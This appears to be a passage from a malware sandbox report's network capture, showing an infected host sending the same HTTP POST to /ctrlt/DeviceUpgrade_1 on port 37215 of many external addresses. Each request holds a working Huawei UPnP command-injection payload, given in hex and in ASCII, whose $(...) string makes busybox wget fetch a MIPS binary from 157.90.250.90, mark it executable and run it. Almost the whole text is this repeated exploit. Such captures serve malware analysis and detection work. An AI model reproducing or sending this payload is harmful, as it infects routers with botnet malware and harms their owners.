                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    41192.168.2.233959841.164.73.8537215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.801292896 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    42192.168.2.234127241.56.205.3437215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.801379919 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    43192.168.2.2345100156.28.189.14737215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.801467896 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    44192.168.2.2340346197.169.178.5537215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.801542997 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    45192.168.2.236007241.102.141.1637215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.801608086 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    46192.168.2.2352016197.195.206.13637215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.801670074 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    47192.168.2.2338152156.64.119.22737215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.801758051 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    48192.168.2.2337384197.59.205.7237215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.801840067 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    49192.168.2.2353726197.167.188.18437215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.801917076 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    50192.168.2.2347630156.44.235.1637215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.802009106 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
